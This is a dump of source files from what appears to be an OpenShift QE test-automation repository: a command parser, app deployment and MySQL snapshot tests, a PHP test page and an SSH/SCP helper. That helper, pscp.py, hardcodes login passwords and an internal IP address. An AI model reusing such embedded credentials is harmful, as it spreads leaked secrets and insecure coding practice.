7)\n\t\tf.add_transition(\"{\", 7, self._vartext, 9)\n\t\tf.add_transition_list(self.VARCHARS, 7, self._vartext, 7)\n\t\tf.add_transition(ANY, 7, self._endvar, 0)\n\t\tf.add_transition(\"}\", 9, self._endvar, 0)\n\t\tf.add_transition(ANY, 9, self._vartext, 9)\n\t\t# vars in singlequote\n\t\tf.add_transition(\"$\", 3, self._startvar, 8)\n\t\tf.add_transition(\"{\", 8, self._vartext, 10)\n\t\tf.add_transition_list(self.VARCHARS, 8, self._vartext, 8)\n\t\tf.add_transition(ANY, 8, self._endvar, 3)\n\t\tf.add_transition(\"}\", 10, self._endvar, 3)\n\t\tf.add_transition(ANY, 10, self._vartext, 10)\n\n\t\t# single quotes quote all\n\t\tf.add_transition(\"'\", 0, None, 2)\n\t\tf.add_transition(\"'\", 2, self._singlequote, 0)\n\t\tf.add_transition(ANY, 2, self._addtext, 2)\n\t\t# double quotes allow embedding word breaks and such\n\t\tf.add_transition('\"', 0, None, 3)\n\t\tf.add_transition('\"', 3, self._doublequote, 0)\n\t\tf.add_transition(ANY, 3, self._addtext, 3)\n\t\t# single-quotes withing double quotes\n\t\tf.add_transition(\"'\", 3, None, 5)\n\t\tf.add_transition(\"'\", 5, self._singlequote, 3)\n\t\tf.add_transition(ANY, 5, self._addtext, 5)\n\t\t# back-tick substitution\n\t\tf.add_transition(\"`\", 0, None, 12)\n\t\tf.add_transition(ANY, 12, self._addtext, 12)\n\t\tf.add_transition(\"`\", 12, self._do_backtick, 0)\n\t\tself._fsm = f\n\n\tdef _startvar(self, c, fsm):\n\t\tfsm.varname = c\n\n\tdef _vartext(self, c, fsm):\n\t\tfsm.varname += c\n\n\tdef _endvar(self, c, fsm):\n\t\tif c == \"}\":\n\t\t\tfsm.varname += c\n\t\telse:\n\t\t\tfsm.push(c)\n\t\ttry:\n\t\t\tfsm.arg += self._cmd._environ.expand(fsm.varname)\n\t\texcept:\n\t\t\tex, val, tb = sys.exc_info()\n\t\t\tself._cmd._ui.error(\"Could not expand variable %r: %s (%s)\" % (fsm.varname, ex, val))\n\n\tdef _error(self, input_symbol, fsm):\n\t\tself._cmd._ui.error('Syntax error: %s\\n%r' % (input_symbol, fsm.stack))\n\t\tfsm.reset()\n\n\tdef _addtext(self, c, fsm):\n\t\tfsm.arg += c\n\n\tdef _wordbreak(self, c, fsm):\n\t\tif fsm.arg:\n\t\t\tself.arg_list.append(fsm.arg)\n\t\t\tfsm.arg = ''\n\n\tdef _slashescape(self, c, fsm):\n\t\tfsm.arg += CommandParser._SPECIAL.get(c, c)\n\n\tdef _singlequote(self, c, fsm):\n\t\tself.arg_list.append(fsm.arg)\n\t\tfsm.arg = ''\n\n\tdef _doublequote(self, c, fsm):\n\t\tself.arg_list.append(fsm.arg)\n\t\tfsm.arg = ''\n\n\tdef _doit(self, c, fsm):\n\t\tif fsm.arg:\n\t\t\tself.arg_list.append(fsm.arg)\n\t\t\tfsm.arg = ''\n\t\targs = self.arg_list\n\t\tself.arg_list = []\n\t\tself._cmd(args) # call command object with argv\n\n\tdef _do_backtick(self, c, fsm):\n\t\tif fsm.arg:\n\t\t\tself.arg_list.append(fsm.arg)\n\t\t\tfsm.arg = ''\n\t\tio = StringIO()\n\t\tsys.stdout.flush()\n\t\tsys.stdout = sys.stdin = io\n\t\ttry:\n\t\t\tsubcmd = self._cmd.subshell(io)\n\t\t\tsubparser = CommandParser(subcmd, self._logfile)\n\t\t\ttry:\n\t\t\t\tsubparser.feed(self.arg_list.pop()+\"\\n\")\n\t\t\texcept:\n\t\t\t\tex, val, tb = sys.exc_info()\n\t\t\t\tprint >>sys.stderr, \" *** %s (%s)\" % (ex, val)\n\t\tfinally:\n\t\t\tsys.stdout = sys.__stdout__\n\t\t\tsys.stdin = sys.__stdin__\n\t\tfsm.arg += io.getvalue().strip()\n\n# get a cli built from sys.argv\ndef run_cli_wrapper(argv, wrappedclass=Shell, cliclass=GenericCLI, theme=None):\n\t\"\"\"Instantiate a class object (the wrappedclass), and run a CLI wrapper on it.\"\"\"\n\timport getopt\n\tlogfile = sourcefile = None\n\tpaged = False\n\ttry:\n\t\toptlist, args = getopt.getopt(argv[1:], \"?hgs:\", [\"help\", \"script=\"])\n\texcept getopt.GetoptError:\n\t\t\tprint wrappedclass.__doc__\n\t\t\treturn\n\tfor opt, val in optlist:\n\t\tif opt in (\"-?\", \"-h\", \"--help\"):\n\t\t\tprint run_cli_wrapper.__doc__\n\t\t\treturn\n\t\telif opt == \"-s\" or opt == \"--script\":\n\t\t\tsourcefile = val\n\t\telif opt == \"-g\":\n\t\t\tpaged = True\n\t\telif opt == \"-l\" or opt == \"--logfile\":\n\t\t\tlogfile = file(val, \"w\")\n\tif args:\n\t\ttargs, kwargs = breakout_args(args)\n\telse:\n\t\ttargs, kwargs = (), {}\n\ttry:\n\t\tobj = apply(wrappedclass, targs, kwargs)\n\texcept (ValueError, TypeError):\n\t\tprint \"Bad parameters.\"\n\t\tprint wrappedclass.__doc__\n\t\treturn\n\tif paged:\n\t\tio = termtools.PagedIO()\n\telse:\n\t\tio = ConsoleIO()\n\tui = UserInterface(io, None, theme)\n\tcmd = get_generic_cmd(obj, ui, cliclass)\n\tcmd._export(\"PS1\", \"%%I%s%%N(%s%s%s)> \" % (wrappedclass.__name__,\n\t\t\t\t\", \".join(map(repr, targs)), IF(kwargs, \", \", \"\"),\n\t\t\t\t\", \".join(map(lambda t: \"%s=%r\" % t, kwargs.items()))) )\n\tcli = CommandParser(cmd, logfile)\n\tif sourcefile:\n\t\tcli.parse(sourcefile)\n\telse:\n\t\tcli.interact()\n\n\ndef run_cli(cmdclass, io, env=None, logfile=None, theme=None, historyfile=None):\n\tui = UserInterface(io, env, theme)\n\tcmd = cmdclass(ui)\n\tparser = CommandParser(cmd, logfile, historyfile)\n\tparser.interact()\n\ndef run_generic_cli(cmdclass=BaseCommands):\n\tenv = environ.Environ()\n\tenv.inherit()\n\tio = ConsoleIO()\n\trun_cli(cmdclass, io, env)\n\n# factory for Command classes. Returns a parser.\ndef get_cli(cmdclass, env=None, aliases=None, logfile=None, paged=False, theme=None, historyfile=None):\n\tif paged:\n\t\tio = termtools.PagedIO()\n\telse:\n\t\tio = ConsoleIO()\n\tui = UserInterface(io, env, theme)\n\tcmd = cmdclass(ui, aliases)\n\tparser = CommandParser(cmd, logfile, historyfile)\n\treturn parser\n\ndef get_terminal_ui(env=None, paged=False, theme=None):\n\tif paged:\n\t\tio = termtools.PagedIO()\n\telse:\n\t\tio = ConsoleIO()\n\treturn UserInterface(io, env, theme)\n\ndef get_ui(ioc=ConsoleIO, uic=UserInterface, themec=DefaultTheme, env=None):\n\tio = ioc()\n\ttheme = themec()\n\treturn uic(io, env, theme)\n\ndef get_key(fd):\n\tsavestate = termtools.tcgetattr(fd)\n\ttry:\n\t\ttermtools.setraw(fd)\n\t\treturn os.read(fd, 1)\n\tfinally:\n\t\ttermtools.tcsetattr(fd, termtools.TCSAFLUSH, savestate)\n\n\n#### self test\n\n# models a BaseCommands class, but only prints argv (used to test parser)\nclass _CmdTest(BaseCommands):\n\n\tdef __call__(self, argv):\n\t\tself._print(\"argv: \")\n\t\tself._print(str(argv))\n\t\tself._print(\"\\n\")\n\t\treturn 0\n\n\nif __name__ == \"__main__\":\n\tenv = environ.Environ()\n\tenv.inherit()\n\tio = ConsoleIO()\n\t#io = termtools.PagedIO()\n\tprint \"=======================\"\n\trun_cli(_CmdTest, io, env)\n\tprint \"=======================\"\n\tenv[\"PS1\"] = \"CLItest> \"\n\tui = UserInterface(io, env, DefaultTheme())\n\tcmd = BaseCommands(ui)\n\tcmd = cmd.clone(DictCLI)\n\tcmd._setup({\"testkey\":\"testvalue\"}, \"dicttest> \")\n\tparser = CommandParser(cmd)\n\tparser.interact()\n\n\n\tf = UserInterface(ConsoleIO(), env, DefaultTheme())\n\tprint f.format(\"%T %t\")\n\tprint f.format(\"%Ibright%N\")\n\n\tprint f.format(\"%rred%N\")\n\tprint f.format(\"%ggreen%N\")\n\tprint f.format(\"%yyellow%N\")\n\tprint f.format(\"%bblue%N\")\n\tprint f.format(\"%mmagenta%N\")\n\tprint f.format(\"%ccyan%N\")\n\tprint f.format(\"%wwhite%N\")\n\n\tprint f.format(\"%Rred%N\")\n\tprint f.format(\"%Ggreen%N\")\n\tprint f.format(\"%Yyellow%N\")\n\tprint f.format(\"%Bblue%N\")\n\tprint f.format(\"%Mmagenta%N\")\n\tprint f.format(\"%Ccyan%N\")\n\tprint f.format(\"%Wwhite%N\")\n\n\tprint f.format(\"%Ddefault%N\")\n\tprint f.format(\"wrapped%ntext\")\n\tprint f.format(\"%l tty %l\")\n\tprint f.format(\"%h hostname %h\")\n\tprint f.format(\"%u username %u\")\n\tprint f.format(\"%$ priv %$\")\n\tprint f.format(\"%d cwd %d\")\n\tprint f.format(\"%L SHLVL %L\")\n\tprint f.format(\"%{PS4}\")\n\n" }, { "alpha_fraction": 0.7101248502731323, "alphanum_fraction": 0.7239944338798523, "avg_line_length": 23.86206817626953, "blob_id": "3f44cc286d059419b4bb88d46acbfea14ecc2899", "content_id": "38f93600048bbe71f5ad50afe39bf3ddd0e15e92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 721, "license_type": "no_license", "max_line_length": 118, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/python_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nOct 24, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom python_without_jenkins import PythonHotDeployWithoutJenkins\n\nclass PythonScalingHotDeployWithoutJenkins(PythonHotDeployWithoutJenkins):\n \n def __init__(self, config):\n PythonHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2747][RT]Hot deployment support for scalable application - without Jenkins - python\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PythonScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6523382067680359, "alphanum_fraction": 0.6580066084861755, "avg_line_length": 49.404762268066406, "blob_id": "996580fdc345027d09a1fc8fdbb92dc90a7351d0", "content_id": "8940e033cc4d1ce3b776d345cd4a5ad93e4ccfb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2117, "license_type": "no_license", "max_line_length": 160, "num_lines": 42, "path": "/automation/open/testmodules/RT/client/data/snapshot_restore_mysql_data/index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\n$OPENSHIFT_MYSQL_DB_HOST = getenv(\"OPENSHIFT_MYSQL_DB_HOST\");\n$OPENSHIFT_MYSQL_DB_PORT= getenv(\"OPENSHIFT_MYSQL_DB_PORT\");\n$OPENSHIFT_MYSQL_DB_USERNAME= getenv(\"OPENSHIFT_MYSQL_DB_USERNAME\");\n$OPENSHIFT_MYSQL_DB_PASSWORD= getenv(\"OPENSHIFT_MYSQL_DB_PASSWORD\");\n$OPENSHIFT_APP_NAME= getenv(\"OPENSHIFT_APP_NAME\");\nif(!empty($_GET[\"action\"])) {\n $action_name = $_GET[\"action\"];\n if ($action_name == \"create\"){\n $con=mysql_connect($OPENSHIFT_MYSQL_DB_HOST.\":\".$OPENSHIFT_MYSQL_DB_PORT, $OPENSHIFT_MYSQL_DB_USERNAME, $OPENSHIFT_MYSQL_DB_PASSWORD) or die(mysql_error());\n mysql_select_db($OPENSHIFT_APP_NAME,$con);\n mysql_query(\"DROP TABLE IF EXISTS ucctalk\",$con);\n mysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\n mysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker1', 'title1')\",$con);\n $result=mysql_query(\"SELECT * FROM ucctalk\",$con);\n while($row=mysql_fetch_array($result)) {\n echo $row['speaker'],\", \",$row['title'],\"\\n\";\n }\n mysql_close($con);\n } elseif ($action_name == \"modify\") {\n $con=mysql_connect($OPENSHIFT_MYSQL_DB_HOST.\":\".$OPENSHIFT_MYSQL_DB_PORT, $OPENSHIFT_MYSQL_DB_USERNAME, $OPENSHIFT_MYSQL_DB_PASSWORD) or die(mysql_error());\n mysql_select_db($OPENSHIFT_APP_NAME,$con);\n mysql_query(\"DROP TABLE IF EXISTS ucctalk\",$con);\n mysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\n mysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker2', 'title2')\",$con);\n $result=mysql_query(\"SELECT * FROM ucctalk\",$con);\n while($row=mysql_fetch_array($result)) {\n echo $row['speaker'],\", \",$row['title'],\"\\n\";\n }\n mysql_close($con);\n } \n}else {\n $con=mysql_connect($OPENSHIFT_MYSQL_DB_HOST.\":\".$OPENSHIFT_MYSQL_DB_PORT, $OPENSHIFT_MYSQL_DB_USERNAME, $OPENSHIFT_MYSQL_DB_PASSWORD) or die(mysql_error());\n mysql_select_db($OPENSHIFT_APP_NAME,$con);\n $result=mysql_query(\"SELECT * FROM ucctalk\",$con);\n while($row=mysql_fetch_array($result)) {\n echo $row['speaker'],\", \",$row['title'],\"\\n\";\n }\n mysql_close($con);\n}\n?>\n" }, { "alpha_fraction": 0.5818908214569092, "alphanum_fraction": 0.5920106768608093, "avg_line_length": 37.711341857910156, "blob_id": "29da3f09c11c8ab4802bc1fabdbafb7d09255b1c", "content_id": "d4c26c50ffa48765f0f8fe28dcc387d779deb122", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3755, "license_type": "no_license", "max_line_length": 136, "num_lines": 97, "path": "/automation/open/testmodules/RT/cartridge/add_modules_to_jboss_server.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US945][rhc-cartridge] Add modules to jboss server\nhttps://tcms.engineering.redhat.com/case/122489/\n\"\"\"\n\nimport os, sys\n# user defined packages\nimport testcase\nimport common\nimport OSConf\nimport rhtest\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"Add modules to jboss server\"\n self.app_type = common.app_types[\"jbossas\"]\n self.app_name = \"jbossmodule\"\n\n self.steps_list = []\n common.env_setup()\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass AddModulesToJbossServer(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a jbossas-7 application\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0,\n expect_description=\"%s app should be created successfully\" %(self.app_name)))\n\n target_dir1 = \"%s/.openshift/config/modules/org/jboss/test/modules/main/\" %(self.app_name)\n target_dir2 = \"%s/src/main/webapp/WEB-INF/lib\" %(self.app_name)\n target_dir3 = \"%s/src/main/webapp\" %(self.app_name)\n source_file1 = \"%s/app_template/jboss_module/TestClass.jar\" %(WORK_DIR)\n source_file2 = \"%s/app_template/jboss_module/module.xml\" %(WORK_DIR)\n source_file3 = \"%s/app_template/jboss_module/test.jar\" %(WORK_DIR)\n source_file4 = \"%s/app_template/jboss_module/modules.jsp\" %(WORK_DIR)\n cmd = \"\"\"mkdir -p %s %s && \n cp %s %s %s && \n cp %s %s && \n cp %s %s\"\"\" %(target_dir1, target_dir2, \n source_file1, source_file2, target_dir1, \n source_file3, target_dir2, \n source_file4, target_dir3)\n self.steps_list.append(testcase.TestCaseStep(\"Add customized jboss module to app\",\n cmd,\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\"))\n\n self.steps_list.append(testcase.TestCaseStep(\"Do git commit\",\n \"cd %s && git add . && git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\"))\n\n def get_app_url(self):\n def closure():\n return OSConf.get_app_url(self.app_name)+\"/modules.jsp\"\n return closure\n\n self.steps_list.append(testcase.TestCaseStep(\"Access jboss module page\",\n common.grep_web_page,\n function_parameters = [get_app_url(self), \n \"org.jboss.test.modules\", \"-H 'Pragma: no-cache'\", 3, 5],\n expect_return=0,\n expect_description=\"Access page successfully\"))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddModulesToJbossServer)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.6655629277229309, "avg_line_length": 26.454545974731445, "blob_id": "57e5cf3a40c981792d54e803069ec356753a6a04", "content_id": "f4ce7a87498b6c0e93a2f13309f57c27093e0710", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 604, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/automation/selenium2libraryext.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from robot.libraries.BuiltIn import BuiltIn\nfrom Selenium2Library.keywords.keywordgroup import KeywordGroup\n\n\ndef _get_s2l():\n return BuiltIn().get_library_instance('Selenium2Library')\n\n\nclass Selenium2LibraryExt(KeywordGroup):\n\n def _run_on_failure(self):\n # required for on failure in this class to work\n # - call Selenium2Library's on failure\n _get_s2l()._run_on_failure()\n\n def do_something(self):\n s2l = _get_s2l()\n webdriver = s2l._current_browser()\n webdriver.maximize_window()\n import time\n time.sleep(5)\n webdriver.close()\n" }, { "alpha_fraction": 0.561495304107666, "alphanum_fraction": 0.5835514068603516, "avg_line_length": 32.86075973510742, "blob_id": "99cadf896564c87f8282c1f82d29fb4594ab4a5b", "content_id": "08e66ff5b5cd1bd85657d08651d2139f27ce3e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2675, "license_type": "no_license", "max_line_length": 93, "num_lines": 79, "path": "/automation/open/lib/pscp.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import paramiko\nimport scp\nimport os\n\nclass Pscp(object):\n scp = None\n ssh = None\n host = None\n\n def __init__(self, host='openshift-mtv-01', port=22, user='root', password='redhat'):\n # make connection\n if host:\n self.host = host\n\n if self.host == '10.14.16.138':\n password = 'vostok08'\n\n t = paramiko.Transport((host, port))\n t.connect(username=user, password=password)\n \n scp_sess = scp.SCPClient(t)\n \n # now, do the actual bootstrap process\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(host, username=user, password=password)\n self.ssh = ssh\n self.scp = scp_sess \n\n def copy_from(self, src, dst='./'):\n \"\"\"\n Copy a dir/file from remote host to specified place\n \"\"\"\n if self.host != 'localhost':\n # don't need to do scp if we are already at localhost\n self.scp.get_r(src, dst)\n\n def copy_to(self, src, dst):\n remote_cmd = \"mkdir -p %s\" % dst\n #print remote_cmd\n stdin, stdout, stderr = self.ssh.exec_command(remote_cmd)\n #print stdout.readlines()\n #print stderr.readlines()\n if self.host != 'localhost':\n # don't need to do scp if we are already at localhost\n self.scp.put_r(src, dst)\n\n def copy_to_global_location(self, src, dst):\n \"\"\"\n copy the html log over to the global location\n \"\"\"\n # first make the top-level directory\n try:\n remote_cmd = \"mkdir -p %s\" % dst.rpartition(os.path.basename(dst))[0]\n except:\n #case, when dst ends with '/'\n remote_cmd = \"mkdir -p %s\" % dst\n print remote_cmd\n stdin, stdout, stderr = self.ssh.exec_command(remote_cmd)\n print stderr.readlines()\n remote_cmd = \"cp -pr %s %s\" % (src, dst)\n print remote_cmd\n stdin, stdout, stderr = self.ssh.exec_command(remote_cmd)\n print stderr.readlines()\n\n\n def __del__(self):\n self.ssh.close()\n\nif __name__ == '__main__':\n #myscp = Pscp(host='localhost', user='pruan', password='vostok08')\n myscp = Pscp(host='10.14.16.138', user='peter', password='vostok08')\n src = '/var/www/html/testresults/201206/25/Collections_Demo_Demo01-279-20120625155434'\n dst = '/automation_logs/OpenShift_QE/automation/testresults/201206/25'\n global_log_basepath = \"/automation_logs/OpenShift_QE/automation\"\n\n global_dst = global_log_basepath + src.split('/var/www/html')[1]\n print global_dst\n myscp.copy_to_global_location(src, global_dst)\n" }, { "alpha_fraction": 0.5323886871337891, "alphanum_fraction": 0.5373048186302185, "avg_line_length": 33.58000183105469, "blob_id": "5278b16ed191606b13b7d5179efcae2fd52992b0", "content_id": "02e0e694de3f7ea48f2d596c538e73273a976b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3458, "license_type": "no_license", "max_line_length": 158, "num_lines": 100, "path": "/automation/open/testmodules/RT/client/rhc_wrapper.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n CART_LIST = []\n BLACKLIST = (\"10gen\", \"rockmongo\", \"phpmyadmin\", \"phpmoadmin\", \"jenkins\")\n\n def initialize(self):\n self.info(\"[US1317][UI][CLI]rhc wrapper - rhc cartridge\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.actions = ['add', 'stop', 'status', 'start', 'restart', 'reload', 'remove']\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass RhcWrapper(OpenShiftTest):\n def gen_cartr_list(self):\n cmd = \"rhc cartridge list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n (status, output) = common.cmd_get_status_output(cmd)\n\n self.assert_equal(status, 0, \"Unable to get list of cartridges\")\n self.assert_match(\"postgresql\", output, \"Missing postgresql support?\")\n self.assert_match(\"mysql\", output, \"Missing mysql support\")\n\n x = re.compile(r\"^(.*-\\d+\\.\\d+, .*-\\d+\\.\\d+, .*)$\", re.MULTILINE)\n obj = x.search(output)\n if (obj):\n self.CART_LIST=[]\n for i in obj.group(1).split(', '):\n print \"Appended %s\"%i\n self.CART_LIST.append(i)\n return 0\n\n def gen_function(self, action, cartridge, app_name):\n cmd = \"rhc cartridge %s %s -a %s -l %s -p '%s' %s \"%(action, cartridge, app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n if action == \"remove\":\n return cmd + \"--confirm\"\n else:\n return cmd\n\n def gen_steps(self, app_names):\n for app_name in app_names:\n print \"app_name:\",app_name\n for cartridge_name in self.CART_LIST:\n print \"cartridge_name:\",cartridge_name\n _x=None\n for black in self.BLACKLIST:\n if re.search(r\"%s\"%black,cartridge_name):\n _x=1\n break\n if _x==1:\n _x=None\n continue\n for action in self.actions:\n self.add_step(\"Execute '%s' with %s\"%(action, cartridge_name),\n self.gen_function(action, cartridge_name, app_name),\n expect_return = 0, try_count=3)\n\n def test_method(self):\n\n self.step(\"Get the list of supported cartridges\")\n self.assert_equal(0, self.gen_cartr_list())\n\n self.step(\"Create a test app\")\n self.assert_equal(0, common.create_app(self.app_name, \n common.app_types['php'], \n self.user_email, \n self.user_passwd, \n False))\n\n #let's generates steps for all cartridges and actions...\n self.gen_steps([self.app_name])\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcWrapper)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5996391773223877, "alphanum_fraction": 0.6035248637199402, "avg_line_length": 82.30635833740234, "blob_id": "5c86b11c459be48b84431ea232b0097e1fc6a878", "content_id": "e10b96fb3440de56adcaf7daacb8218cb626be2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14412, "license_type": "no_license", "max_line_length": 601, "num_lines": 173, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_big_mysql_data_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-24\n\n[rhc-cartridge]snapshot/restore big data to new app\nhttps://tcms.engineering.redhat.com/case/167902/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n self.summary = \"[rhc-cartridge]snapshot/restore big mysql data to new app\"\n self.app_name = self.test_variant.split('-')[0] + \"bigmysql\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n self.record_count = 500000 # amount of records to be inserted\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -f %s*\" % (self.app_name))\n\n\nclass BigMysqlDataTest(OpenShiftTest):\n\n def test_method(self):\n self.step(\"Create %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.app_url = OSConf.get_app_url(self.app_name)\n self.url_dict = { \"php\" : { \"insert\": \"%s/mysql.php?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql.php?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql.php?action=show\" % (self.app_url)},\n \"jbossas\": { \"insert\": \"%s/mysql.jsp?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql.jsp?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql.jsp?action=show\" % (self.app_url)},\n \"perl\" : { \"insert\": \"%s/mysql.pl?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql.pl?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql.pl?action=show\" % (self.app_url)},\n \"python\": { \"insert\": \"%s/insert?size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/delete\" % (self.app_url),\n \"show\" : \"%s/show\" % (self.app_url)},\n \"ruby\" : { \"insert\": \"%s/mysql?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql?action=show\" % (self.app_url)},\n }\n self.url_dict[\"jbosseap\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"ruby-1.9\"] = self.url_dict[\"ruby\"]\n\n self.step(\"Embed mysql to the app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n\n self.step(\"Copy sample app to git repo and git push\")\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in ('php'):\n cmd = \"cd '%s/php/' && cp -f '%s/app_template/bigdata/mysql/mysql.php' . && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php && sed -i -e 's/#dbname/%s/g' mysql.php && sed -i -e 's/#user/%s/g' mysql.php && sed -i -e 's/#passwd/%s/g' mysql.php && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('jbossas', 'jbosseap'):\n cmd = \"cd '%s/src/main/webapp/' && cp -f '%s/app_template/bigdata/mysql/mysql.jsp' . && mkdir WEB-INF/lib && cp -f '%s/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar' WEB-INF/lib && sed -i -e 's/#host/%s/g' mysql.jsp && sed -i -e 's/#port/%s/g' mysql.jsp && sed -i -e 's/#dbname/%s/g' mysql.jsp && sed -i -e 's/#user/%s/g' mysql.jsp && sed -i -e 's/#passwd/%s/g' mysql.jsp && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, 